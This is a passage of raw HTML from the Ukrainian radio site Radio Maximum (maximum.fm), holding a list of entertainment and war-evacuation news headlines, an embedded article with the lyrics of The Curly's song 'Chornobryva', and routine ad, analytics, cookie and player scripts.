<a data-url="/zhiti-dali-povoli-khayat-prezentuvav-klip-na-novu-pisnyu-nehaj_n206275" title="" class="ajaxLink" target="_self" href="/zhiti-dali-povoli-khayat-prezentuvav-klip-na-novu-pisnyu-nehaj_n206275">
<div class="time">19:31</div>
<div class="news-title">
Жити далі поволі: KHAYAT презентував кліп на нову пісню &quot;Нехай&quot;
</div>
</a>
</li>
<li data-published-date="2022-10-02 15:33:00" class=" photo   ">
<a data-url="/dudarik-virushiv-u-chergovij-blagodijnij-tur-mistami-yevropi_n206268" title="" class="ajaxLink" target="_self" href="/dudarik-virushiv-u-chergovij-blagodijnij-tur-mistami-yevropi_n206268">
<div class="time">15:33</div>
<div class="news-title">
&quot;Дударик&quot; вирушив у черговий благодійний тур містами Європи
</div>
</a>
</li>
<li data-published-date="2022-10-02 11:31:00" class=" photo   ">
<a data-url="/ukrayinska-spivachka-shadu-vipustila-anglomovnij-ep-albom-gravity_n206267" title="" class="ajaxLink" target="_self" href="/ukrayinska-spivachka-shadu-vipustila-anglomovnij-ep-albom-gravity_n206267">
<div class="time">11:31</div>
<div class="news-title">
Українська співачка SHADU випустила англомовний EP-альбом GRAVITY
</div>
</a>
</li>
<li class="month">
01 жовтня
</li>
<li data-published-date="2022-10-01 18:51:00" class="   ">
<a data-url="/stini-ce-ne-bezpeka-yana-z-kiyeva-poyasnila-chomu-ne-mozhna-ignoruvati-shans-na-evakuaciyu-_n206280" title="" class="ajaxLink" target="_self" href="/stini-ce-ne-bezpeka-yana-z-kiyeva-poyasnila-chomu-ne-mozhna-ignoruvati-shans-na-evakuaciyu-_n206280">
<div class="time">18:51</div>
<div class="news-title">
&quot;Стіни – це не безпека&quot;: Яна з Києва пояснила, чому не можна ігнорувати шанс на евакуацію
</div>
</a>
</li>
<li data-published-date="2022-10-01 12:33:00" class="   ">
<a data-url="/goroskop-na-zhovten-2022-udacha-bude-na-boci-cih-3-znakiv-zodiaku_n206265" title="" class="ajaxLink" target="_self" href="/goroskop-na-zhovten-2022-udacha-bude-na-boci-cih-3-znakiv-zodiaku_n206265">
<div class="time">12:33</div>
<div class="news-title">
Гороскоп на жовтень 2022: удача буде на боці цих трьох знаків Зодіаку
</div>
</a>
</li>
<li class="month">
30 вересня
</li>

<li data-published-date="2022-09-30 20:20:00" class="   ">
<a data-url="/krashche-za-seks-u-merezhi-rozpovili-shcho-prinosit-zadovolennya-na-rivni-z-orgazmom_n200508" title="" class="ajaxLink" target="_self" href="/krashche-za-seks-u-merezhi-rozpovili-shcho-prinosit-zadovolennya-na-rivni-z-orgazmom_n200508">
<div class="time">20:20</div>
<div class="news-title">
Краще за секс: у мережі розповіли, що приносить задоволення на рівні з оргазмом
</div>
</a>
</li>

<li data-published-date="2022-09-30 17:27:00" class=" video   ">
<a data-url="/artem-pivovarov-ta-alyona-alyona-vipustili-hit-lyuli-lyuli-na-virsh-kulisha_n206260" title="" class="ajaxLink" target="_self" href="/artem-pivovarov-ta-alyona-alyona-vipustili-hit-lyuli-lyuli-na-virsh-kulisha_n206260">
<div class="time">17:27</div>
<div class="news-title">
Артем Пивоваров та Alyona Alyona випустили хіт &quot;Люлі-Люлі&quot; на вірш Куліша
</div>
</a>
</li>
<li data-published-date="2022-09-30 13:21:00" class=" photo   ">
<a data-url="/dim--ce-ne-misto-a-krayina-istoriya-marini-yake-pereyihala-z-kiyeva-v-ivano-frankivsk_n206258" title="" class="ajaxLink" target="_self" href="/dim--ce-ne-misto-a-krayina-istoriya-marini-yake-pereyihala-z-kiyeva-v-ivano-frankivsk_n206258">
<div class="time">13:21</div>
<div class="news-title">
Дім – це не місто, а країна: історія Марини, яке переїхала з Києва в Івано-Франківськ
</div>
</a>
</li>
<li data-published-date="2022-09-30 10:43:00" class=" photo   ">
<a data-url="/privitannya-z-dnem-vchitelya-najkrashchi-pobazhannya-ukrayinskoyu_n148954" title="" class="ajaxLink" target="_self" href="/privitannya-z-dnem-vchitelya-najkrashchi-pobazhannya-ukrayinskoyu_n148954">
<div class="time">10:43</div>
<div class="news-title">
Привітання з Днем вчителя 2022: побажання від учнів і батьків українською
</div>
</a>
</li>
<li class="month">
29 вересня
</li>

<li data-published-date="2022-09-29 21:14:47" class="   ">
<a data-url="/niyakogo-rozdilennya-nemaye-yana-z-harkivshchini-pro-zhittya-v-ivano-frankivsku_n206254" title="" class="ajaxLink" target="_self" href="/niyakogo-rozdilennya-nemaye-yana-z-harkivshchini-pro-zhittya-v-ivano-frankivsku_n206254">
<div class="time">21:14</div>
<div class="news-title">
&quot;Ніякого розділення немає&quot;: Яна з Харківщини про життя в Івано-Франківську
</div>
</a>
</li>
<li data-published-date="2022-09-29 18:52:00" class=" video   ">
<a data-url="/nove-zaspokijlive-dlya-vsih-ukrayinok-pisnya-koliskova-vid-dima-prokopov_n206246" title="" class="ajaxLink" target="_self" href="/nove-zaspokijlive-dlya-vsih-ukrayinok-pisnya-koliskova-vid-dima-prokopov_n206246">
<div class="time">18:52</div>
<div class="news-title">
Нове &quot;заспокійливе&quot; для всіх українок – пісня &quot;Колискова&quot; від Dima PROKOPOV
</div>
</a>
</li>
<li data-published-date="2022-09-29 15:29:00" class=" photo   ">
<a data-url="/snaryad-ne-vhopish-rukoyu-pereselenka-z-luganshchini-poyasnila-chomu-evakuaciya-neobhidna_n206253" title="" class="ajaxLink" target="_self" href="/snaryad-ne-vhopish-rukoyu-pereselenka-z-luganshchini-poyasnila-chomu-evakuaciya-neobhidna_n206253">
<div class="time">15:29</div>
<div class="news-title">
&quot;Снаряд не вхопиш рукою&quot;: переселенка з Луганщини пояснила, чому евакуація необхідна
</div>
</a>
</li>

<li data-published-date="2022-09-29 12:24:45" class=" video   ">
<a data-url="/yuna-ukrayinka-svoyim-tancem-rozchulila-suddiv-shou-ispaniya-shukaye-talanti--video_n206249" title="" class="ajaxLink" target="_self" href="/yuna-ukrayinka-svoyim-tancem-rozchulila-suddiv-shou-ispaniya-shukaye-talanti--video_n206249">
<div class="time">12:24</div>
<div class="news-title">
Юна українка своїм танцем розчулила суддів шоу &quot;Іспанія шукає таланти&quot; – відео
</div>
</a>
</li>
<li class="month">
28 вересня
</li>
<li data-published-date="2022-09-28 19:07:00" class=" photo   ">
<a data-url="/zamist-54-misc-u-vagoni-bulo-300-pereselenka-z-donechchini-rozpovila-pro-svoyu-evakuaciyu_n206239" title="" class="ajaxLink" target="_self" href="/zamist-54-misc-u-vagoni-bulo-300-pereselenka-z-donechchini-rozpovila-pro-svoyu-evakuaciyu_n206239">
<div class="time">19:07</div>
<div class="news-title">
&quot;Замість 54 місць у вагоні було 300&quot;: переселенка з Донеччини розповіла про свою евакуацію
</div>
</a>
</li>
<li data-published-date="2022-09-28 17:19:00" class=" photo   ">
<a data-url="/frontovi-budni-den-andriya-hlivnyuka-na-peredovij-pokazali-u-seriyi-foto_n206238" title="" class="ajaxLink" target="_self" href="/frontovi-budni-den-andriya-hlivnyuka-na-peredovij-pokazali-u-seriyi-foto_n206238">
<div class="time">17:19</div>
<div class="news-title">
Фронтові будні: день Андрія Хливнюка на передовій показали у серії фото
</div>
</a>
</li>
<li data-published-date="2022-09-28 15:51:00" class="  last ">
<a data-url="/kinec-veresnya-bude-osoblivim-cih-znakiv-zodiaku-pochinayetsya-novij-cikl_n206237" title="" class="ajaxLink" target="_self" href="/kinec-veresnya-bude-osoblivim-cih-znakiv-zodiaku-pochinayetsya-novij-cikl_n206237">
<div class="time">15:51</div>
<div class="news-title">
Кінець вересня буде особливим цих знаків Зодіаку: починається новий цикл
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news top">Більше новин
</button>
</div>
</div>
</div>
<div style="margin: 20px 0" id="recommended">
<script>
    const addPubAdsScript = () => {
        var parentEl = document.getElementsByTagName('body');
        var pubAdsScript = document.createElement('script');
        pubAdsScript.src = "https://securepubads.g.doubleclick.net/tag/js/gpt.js";
        pubAdsScript.async = true;
        parentEl[0].appendChild(pubAdsScript);
    };

    const listener = () => {
        if(window.scrollY > 200) {
            addPubAdsScript();
            window.removeEventListener('scroll', listener);
        }
    }
    window.addEventListener('scroll', listener);
</script>
<script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function () {
        googletag.defineSlot('/56301415/maximum_right_column_more_news', [[1, 1], [300, 250], [300, 600]], 'div-gpt-ad-1640335916932-0').addService(googletag.pubads());
        googletag.pubads().enableSingleRequest();
        googletag.enableServices();
    });
</script>

<div id='div-gpt-ad-1640335916932-0' style='min-width: 300px; min-height: 250px; text-align: center'>
<script>
        googletag.cmd.push(function () {
            googletag.display('div-gpt-ad-1640335916932-0');
        });
    </script>
</div> </div>
</div>
</div>
</div>
<script>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</script>
<div id="mobile-branding">
<div id="mobile-branding-wrapper" style="height: 0">
<div id='div-gpt-ad-1479289268975-0'></div>
</div>
</div>
<script>
    if (window.innerWidth < 640) {
        let headerQuerySelector = 'header';
        // if (document.getElementById('mobileBrandingPlace') === null) {
        //     let mobileBrandingWrapper = document.createElement('div');
        //     mobileBrandingWrapper.id = 'mobileBrandingPlace';
        //     mobileBrandingWrapper.style.zIndex = 9;
        //     document.querySelector(headerQuerySelector).after(mobileBrandingWrapper)
        // }
        window.mobileBrandingConfig = {
            mobileBrandingPlace: '#mobileBrandingPlace',
            headerHeight: 0,
            isHeaderSticky: true,
            headerQuerySelector: headerQuerySelector
        }
        var removeMobileBranding = function () {
            ['mobileBrandingSmall', 'mobileBrandingSmallBannerWrapper'].forEach(item => {
                let branding = document.getElementById(item);
                if (branding && countNews <= 2) {
                    branding.remove();
                }
            });
            const event = document.createEvent('Event');
            event.initEvent('disableSmallMobileBranding', true, true);
            window.dispatchEvent(event);
        }

        initMobileBranding();

        observer('.hide-mobile-adv', removeMobileBranding, 1, false);
    }
</script>
<script>
        let newsText = `&lt;p&gt;Прем&amp;#39;єра треку &quot;Чорнобрива від виконавця The Curly відбулася 30 вересня 2022 року на YouTube. За кілька днів ця пісня вже зібрала понад 10 000 прослуховувань, лайки та схвальні коментарі від слухачів. До слова, юний музикант співпрацює з Black Beats.&lt;/p&gt;

&lt;p class=&quot;read-also&quot;&gt;І ще: &lt;a href=&quot;https://maximum.fm/dosi-lyublyu-max-barskih-ta-dasha-suvorova-zapisali-spilnu-pisnyu-pro-lviv_n206306&quot;&gt;&quot;Досі люблю&quot;: Max Barskih та Даша Суворова записали спільну пісню про Львів&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Молодий виконавець отримав такі позитивні коментарі: &quot;Занадто короткий трек, як для прекрасного&quot;, &quot;Ех, зараз би залетіти в клуб під цей трек, познайомитись з гарною дівчиною і ніколи не розлучатися з нею&quot;, &quot;Кайф, хочеться ще більше контенту від тебе&quot;, &quot;Це просто пожежа! Як пісня цього треку заснути?&quot; тощо.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;strong&gt;Слухати пісню The Curly &amp;ndash; Чорнобрива:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;

&lt;section class=&quot;media_embed&quot;&gt;&lt;iframe allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen=&quot;&quot; frameborder=&quot;0&quot; height=&quot;360&quot; src=&quot;https://www.youtube.com/embed/AoUMO6pgekk?enablejsapi=1&amp;origin=https://maximum.fm&quot; title=&quot;The Curly - Чорнобрива (Прем&#039;єра, 2022)&quot; width=&quot;640&quot;&gt;&lt;/iframe&gt;&lt;/section&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Слова пісні The Curly &amp;ndash; Чорнобрива:&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I have 18 reasons to hate you&lt;br /&gt;
Я скажу тобі слова, що &amp;ndash;&lt;br /&gt;
&quot;останній поцілунок мені скрасить життя&quot;&lt;/p&gt;

&lt;p&gt;Every time I fall in love&lt;br /&gt;
It&amp;rsquo;s f*cking breaking my heart &lt;/p&gt;

&lt;p&gt;Чорнобрива, мила, &lt;br /&gt;
скажи мені як звуть тебе &lt;br /&gt;
О чарівна чарівна, &lt;br /&gt;
ну скажи мені як звуть тебе &lt;/p&gt;

&lt;p&gt;But I see you have some different preferences &lt;br /&gt;
I wanna be in love with you, but I&amp;rsquo;m so scare &lt;br /&gt;
І я тобі скажу ти така гарна, наче ясний день &lt;/p&gt;

&lt;p&gt;I Feel like I am alive. &lt;br /&gt;
I am alive when you looking in my eyes &lt;/p&gt;

&lt;p&gt;Чорнобрива, мила, &lt;br /&gt;
скажи мені як звуть тебе &lt;br /&gt;
О чарівна чарівна, &lt;br /&gt;
ну скажи мені як звуть тебе &lt;/p&gt;

&lt;p&gt;And I wanna be inside your mind&lt;br /&gt;
Слухай, everything all right &lt;br /&gt;
Я лиш хочу чути тебе, &lt;br /&gt;
але сильно не зважай &lt;br /&gt;
And I wanna wake up &lt;br /&gt;
and talk about nothing every day &lt;br /&gt;
І я тобі кажу, що ти нестерпно мила &lt;br /&gt;
і ти варта всіх пісень&lt;/p&gt;

&lt;p&gt;Чорнобрива, мила, &lt;br /&gt;
скажи мені як звуть тебе &lt;br /&gt;
О чарівна чарівна,&lt;br /&gt;
ну скажи мені як звуть тебе&lt;/p&gt;

&lt;p class=&quot;read-also&quot;&gt;До теми: &lt;a href=&quot;https://maximum.fm/viye-sirena-a-vsi-jdut-na-shchekavicyu-jerry-heil-perespivala-hit-olega-vinnika_n206289&quot;&gt;&quot;Виє сирена, а всі йдуть на Щекавицю&quot;: Jerry Heil переспівала хіт Олега Винника&lt;/a&gt;&lt;/p&gt;`;
        let pos = newsText.search("fotorama");
        if(pos !== -1){
            var parentEl = document.getElementsByTagName('body');
            var fotoramaJs = document.createElement('script');
            fotoramaJs.src = "/assets/js/fotorama.js?v=57";
            fotoramaJs.setAttribute('data-cfasync', 'false');
            parentEl[0].appendChild(fotoramaJs);
        }
    </script>
<script>
        var ntsVideoHtml = `<div class="nts-video-wrapper">
                                <div class="nts-video-label">Відео дня</div>
                                <div class="nts-video" id="MFM_VIDEO"></div>
                            </div>`;
        var readAlsoBlock = document.querySelector('.read-also').insertAdjacentHTML('afterend', ntsVideoHtml);

        window.notsyCmd = window.notsyCmd || [];
        window.notsyCmd.push(function() {
            window.notsyInit({
                pageVersionAutodetect: true
            });
        });
    </script>
<script>
                (function () {
    var node = document.createElement("p");
    node.setAttribute("id", "withinNewsTextBanner");
    node.innerHTML = "<div id='div-gpt-ad-1586862014522-0'></div><div id='div-gpt-ad-1586862041493-0'></div>";
    var summary = document.querySelector(".news-content");
    summary.insertBefore(node, summary.childNodes[Math.floor(summary.childNodes.length / 2)]);
    var slotId;
    var slotSize;
    var wrapperId;
    var height;

    if (window.innerWidth < 640) {
        slotId = '/56301415/maximum_mobile_300x250_in_news';
        slotSize = [300, 250];
        wrapperId = 'div-gpt-ad-1586862041493-0';
        height = 250;
    } else {
        slotId = '/56301415/maximum_600x300_in_news';
        slotSize = [600, 300];
        wrapperId = 'div-gpt-ad-1586862014522-0';
        height = 350;
    }
    adCore.defineDfpSlot({
        'name': slotId,
        'sizes': slotSize,
        'id': wrapperId,
        'targeting': [],
        'callback': function (e) {
            if(!e.isEmpty) {
                var wrapper = document.getElementById(wrapperId);
                var iFrame = wrapper.getElementsByTagName("iframe")[0];
                if (iFrame) {
                    iFrame.width = '100%';
                    iFrame.height = height;
                }
            }
        }
    });
    var wrapperNode = document.getElementById(wrapperId);
    if (window.innerWidth < 640) {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 250px;')
    } else {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 350px;')
    }
})();
    </script>
<script>
        
        $(function () {

                        
            getShareCount({
                'newsId': '206316',
                'sharingUrl': 'https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316',
                'whatIs': 'news'
            });

        });

    </script>
<script>
        $(function () {
            new ClipboardTextWatermark({
                selector: '.news-content-wrapper',
                prefixText: 'Новини',
                link: 'https://maximum.fm/novini_t2',
                textWatermark: '<br/>https://maximum.fm/novini_t2'
            });
        });

    </script>
<script>
        function initTwentyTwenty(){
            const images = $('.before-after-comparator').find('img');
            $(images).each(function (){
                this.onload = function (){
                    if (this.height > 0){
                        $(function () {
                            $(".before-after-comparator").each(function (){
                                if(!$(this).hasClass('twentytwenty-container')){
                                    $(this).twentytwenty();
                                }
                            })
                        });
                    }
                }
            })
        }
        // this only for reload page
        window.addEventListener('load', function (e) {
            $(".before-after-comparator").each(function (){
                if(!$(this).hasClass('twentytwenty-container')){
                    $(this).twentytwenty();
                }
            })
        })
        // tis work after ajax replace content
        initTwentyTwenty();
    </script>
<script>
        (function () {
            $('#ontheioViewTacking').attr('data-io-article-url', window.location.href);
        })();
    </script>
<script>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</script>
<script src="/assets/js/replaceViewsCount.js?v=57"></script>
<script>
        window.addEventListener('pageshow', function () {
            new replaceViewsCount.Init({
                newsId: '206316',
                parentClass: '.news-content-wrapper',
                elementClass: '.watchers',
                url: '/get-count-views'
            });
        });
    </script>

<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var onTheIoScript = document.createElement('script');
            onTheIoScript.src = "https://cdn.onthe.io/io.js/Hz0HedbhBSNo"
            parentEl[0].appendChild(onTheIoScript);
        }, 1800);
    </script>
<script>
            window._io_config = window._io_config || {};
            window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
            window._io_config["0.2.0"].push({
                page_url: window.location.href,
                page_url_canonical: "https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316",
                page_title: "'Чорнобрива': слухайте крутий трек від юного виконавця The Curly - Радіо Максимум",
                page_type: "article",
                page_language: "uk",
                article_authors: ["Валентина Рущак"],
                article_categories: ["Музика"],
                article_type: "Новини",
                article_word_count: "320",
                article_publication_date: "Wed, 05 Oct 2022 18:21:00 +0300"
            });
        </script>

<script src="/assets/js/news.js?v=57"></script>
<script>new news.lazyEmbeds();</script>
</div>
<div class="mobile-320-ad" id="radio24_320x50">
<div id="mobile-320-ad-close">close</div>
<div id='div-gpt-ad-1474010488480-0' style='min-width: 320px; min-height: 50px;'></div>
</div>
<script>
    $('#mobile-320-ad-close').click(function () {
        $('#radio24_320x50').hide();
    });
</script>
<script>
    if( typeof dfpAdSlots === 'undefined'){
        var dfpAdSlots = [];
    }

    lazyLoadScripts(function () {
        if(adCore.isLargerThan(1024)) {
            dfpAdSlots['brandingAdSlot'] = adCore.defineDfpSlot({
                'name': '/56301415/radio24_newBranding',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1465852635468-0',
                'targeting': [
                    ['pageType', adCore.getPageName()],
                                        ['newsId', '206316'],
                    ['tagId', 'Шоу-біз,Музика,Українська музика,Відео,Музичні новинки,Новини'],
                                    ],
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if (typeof Foundation != 'undefined') {
                        new Foundation.Equalizer($('#topNewsEqualiser'));
                    }
                    if (e.isEmpty) {
                        if (adCore.isLargerThan(1279)) {
                            $('body').addClass('branding');
                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_left',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534586171-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534586171-0'); });

                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_right',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534615722-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534615722-0'); });
                        }
                    } else {
                        dfpAdSlots['brandingAdSlot'] = e.slot;
                    }
                }
            });
        }
    }, 2000);
</script>
<div class="adv-container">
<div class="row">
<div id="branding_wrap" class="bending_wrap"></div>
</div>
</div>
<div id='div-gpt-ad-1465852635468-0'>
<script type='text/javascript'>
        lazyLoadScripts(function () {
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465852635468-0'); });
            }
        }, 2500);
    </script>
</div>
<div class="adv-container">
<div id="branding-wrapp" class="branding-wrapp">
<div class="google-left-img">
<div id="google-left-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534586171-0'>
</div>
</div>
</div>
<div class="google-right-img">
<div id="google-right-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534615722-0'>
</div>
</div>
</div>
</div>
</div>

<script src="/assets/js/lazyLoad.js?v=57"></script>
<script>new lazyLoad.Init();</script>
<script src="/assets/js/application.js?v=57"></script>
<script>
    $('.play-btn').mousedown(function () {
        let playerBtn = $(this);
        if (false === playerBtn.hasClass('play-clicked')) {
            loadPlayer();
            playerBtn.addClass('play-clicked');
        }
    });

    function loadPlayer() {
        application.cssSrc('/assets/css/videojs/videojs.min.css?v=57');
        var player = window.player = videojs('audio-player');
        application.scriptSrc('/assets/js/player.min.js?v=57');
    }
</script>
<script>
    document.addEventListener("DOMContentLoaded", function (){
        const node = document.getElementById('news-list-wrapper');
        if(node){
            const isMainPage = parseInt(node.getAttribute('data-main'));
            if (isMainPage !== 1 ) {
                if (window.innerWidth > 640){
                    application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
                }
            } else {
                application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
            }
        }
    });
</script>
<footer>
<div class="footer-content">
<div class="row">
<div class="logo-wrapper columns small-12 medium-6">
<a href="/" class="main-logo ajaxLink" data-url="/"></a>
<div class="slogan">Від легендарних до сьогодні! МАКСИМУМ хітів на Радіо МАКСИМУМ</div>
<div class="copyrights">
При цитуванні і використанні будь-яких матеріалів в Інтернеті відкриті для пошукових систем
гіперпосилання не нижче першого абзацу на «Радіо Максимум» — обов’язкові.
Цитування і використання матеріалів у оффлайн-медіа, Мобільних додатках, SmartTV можливе лише з
письмової згоди «Радіо Максимум».
Матеріали з маркуванням «Реклама» публікуються на правах реклами.
Усі права захищені. © 2005—2022, ПрАТ «Телерадіокомпанія “Люкс”», «Радіо Максимум»
</div>
</div>
<div class=" columns small-12 medium-5">
<ul class="social">
<li class="social-button"><a href="//www.facebook.com/maximumfmua" class="facebook" target="_blank"></a></li>
<li class="social-button"><a href="//twitter.com/maximumfm_ua" class="twitter" target="_blank"></a></li>
<li class="social-button"><a href="/rssAll.xml" class="rss" target="_blank"></a></li>
<li class="social-button"><a href="//itunes.apple.com/ua/app/radio-24/id797596046?mt=8" class="appstore" target="_blank"></a></li>
<li class="social-button"><a href="//play.google.com/store/apps/details?id=com.radio24.ua" class="playmarket" target="_blank"></a></li>
</ul>
<ul class="links">
<li title="Архів">
<a class="ajaxLink" data-url="/archive" title="Архів" href="/archive">Архів</a>
</li>
<li>
<a href="/contacts#ownership-structure">Структура власності</a>
</li>
<li title="Контакти">
<a class="ajaxLink" data-url="/contacts" title="Контакти" href="/contacts">Контакти</a>
</li>
<li title="Політика користування сайтом">
<a class="ajaxLink" data-url="/rules" title="Політика користування сайтом" href="/rules">Політика користування сайтом</a>
</li>
<li title="Ведучі">
<a class="ajaxLink" data-url="/staff" title="Ведучі" href="/staff">Ведучі</a>
</li>
<li>
<a href="//maximum.fm/uploads/maximum.m3u">Завантажити для плеєра</a>
</li>
<li title="Карта покриття">
<a class="ajaxLink" data-url="/radiocovermap" title="Карта покриття" href="/radiocovermap">Карта покриття</a>
</li>
<li title="Політика конфіденційності">
<a class="ajaxLink" data-url="/copyrights" title="Політика конфіденційності" href="/copyrights">Політика конфіденційності</a>
</li>
</ul>
</div>
</div>
</div>
</footer>
<script>
    function desktopNewsCatfishInit() {
        if (adCore.isLargerThan(1023)) {
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_desktop_catfish',
                'sizes': [[1, 1], [970, 90]],
                'id': 'div-gpt-ad-1638533775236-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    var marketGrid = document.getElementById('market-grid');
                    if (!e.isEmpty) {
                        marketGrid.style.display = 'flex';

                        if (e.size[0] === 1 && e.size[1] === 1) {
                            let iFrame = marketGrid.getElementsByTagName("iframe")[0];
                            if (iFrame) {
                                iFrame.width = '990';
                                iFrame.height = '182';
                            }
                        }
                    } else {
                        marketGrid.style.display = 'none';
                    }
                }
            });
        }
    }

    desktopNewsCatfishInit();
</script>
<div id="market-grid" style="display: none;" class="market-grid">
<div id='div-gpt-ad-1638533775236-0' style='min-width: 970px; min-height: 90px;'>
<script>
            lazyLoadScripts(function () {
                if (adCore.isLargerThan(1023)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1638533775236-0');
                    });
                }
            }, 1500)
        </script>
</div>
<button class="close close-cat-fish"></button>
</div>
<script>
    $('.close-cat-fish').click(function () {
        $('#market-grid').remove();
    });
</script>
<div class="player-wrapper" style="overflow: hidden; opacity: 0 !important; height: 0; position: absolute; z-index: -1;">
<video id="audio-player" preload="auto" class="video-js vjs-default-skin" playsinline data-setup='{}' controls>
<source src="https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8" type="application/x-mpegURL" />
</video>
</div>
<script>
        lazyLoadScripts(function () {
            $(document).ready(function () {
                $('.expand-stations-wrapper').click(function () {
                    var stations = $('.stations-wrapper-header-block');

                    var isHidden = !stations.hasClass('full-view');
                    if (typeof getCookie("isStationsOpen") !== "undefined") {
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    } else {
                        deleteCookie("isStationsOpen");
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    }
                });
            });
        }, 2000);

        function deleteCookie(name) {
            setCookie(name, "", {
                expires: -1
            })
        }

        function getCookie(name) {
            var matches = document.cookie.match(new RegExp(
                "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
            ));
            return matches ? decodeURIComponent(matches[1]) : undefined;
        }

        function setCookie(name, value, options) {
            options = options || {};

            var expires = options.expires;

            if (typeof expires === "number" && expires) {
                var d = new Date();
                d.setTime(d.getTime() + expires * 1000);
                expires = options.expires = d;
            }
            if (expires && expires.toUTCString) {
                options.expires = expires.toUTCString();
            }

            value = encodeURIComponent(value);

            var updatedCookie = name + "=" + value;

            for (var propName in options) {
                updatedCookie += "; " + propName;
                var propValue = options[propName];
                if (propValue !== true) {
                    updatedCookie += "=" + propValue;
                }
            }

            document.cookie = updatedCookie;
        }
    </script>
<script>
        lazyLoadScripts(function () {
            (function () {
                if (typeof window.CustomEvent === "function") return false; //If not IE

                function CustomEvent(event, params) {
                    params = params || {bubbles: false, cancelable: false, detail: undefined};
                    var evt = document.createEvent('CustomEvent');
                    evt.initCustomEvent(event, params.bubbles, params.cancelable, params.detail);
                    return evt;
                }

                CustomEvent.prototype = window.Event.prototype;

                window.CustomEvent = CustomEvent;
            })();
        }, 2000);
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var libScript = document.createElement('script');
            libScript.src = "https://imasdk.googleapis.com/js/sdkloader/ima3.js"
            parentEl[0].appendChild(libScript);
        }, 1500);
    </script>
<script src="/assets/js/lib.min.js?v=57"></script>
<script src="/assets/js/news.js?v=57"></script>
<script>
        new news.getMoreNews({
            url: '/get-more-video-news',
            loadBtn: $('.load-more-news'),
        })
    </script>
<script src="/assets/js/app.min.js?v=57"></script>
<script>
    function getAllStream() {
                    var stream = {
                type: 'application/x-mpegURL',
                src: 'https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8'
            };
            streamConfig.addStream('onair', stream);
                streamConfig.onAirId = '4';
        streamConfig.onAirName = 'onair';
    }

    function getPrerollLink() {
        player.adTagLink = 'https\u003A\/\/inv\u002Dnets.admixer.net\/daast.aspx\u003Fzone\u003D1ba30f9d\u002Dfe35\u002D415f\u002Da6b5\u002D7077a40865ad\u0026rnd\u003D\u0025\u0025CACHEBUSTER\u0025\u0025\u0026page\u003D\u0025\u0025REFERRER_URL_ESC\u0025\u0025';
    }
</script>
<script src="/assets/js/websocket.js?v=57"></script>
<script>
        new websocket.Init({
            cdnHost: 'https://imagecdn3.luxnet.ua/music/web',
            wsHost: 'wss://maximum.fm/get-station-ws',
            headerSongLimit: 3,
            stationSongListLimit: 15
        });
    </script>
<script type="text/javascript">
        lazyLoadScripts(function () {
            $.smartbanner({
                title: ' ',
                author: 'Безкоштовно',
                inAppStore: 'Встановлюй на iOS', // Text of price for iOS
                inGooglePlay: 'Встановлюй на Android', // Text of price for Android
                price: ' ',
                button: 'Встановити'
            })
        }, 60000);
    </script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Organization",
        "name": "Радіо Максимум",
        "foundingDate": "2017-10-03",
        "url": "https://maximum.fm/",
        "sameAs": [
            "https://maximum.fm/",
            "https://uk.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B4%D1%96%D0%BE_%D0%9C%D0%B0%D0%BA%D1%81%D0%B8%D0%BC%D1%83%D0%BC",
            "https://www.facebook.com/maximumfmua",
            "https://twitter.com/maximumfm_ua",
            "https://apps.apple.com/ua/app/radio-24/id797596046",
            "https://play.google.com/store/apps/details?id=com.radio24.ua"
        ],
        "logo": {
            "@type": "ImageObject",
            "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png"
        },
        "address": {
            "@type": "PostalAddress",
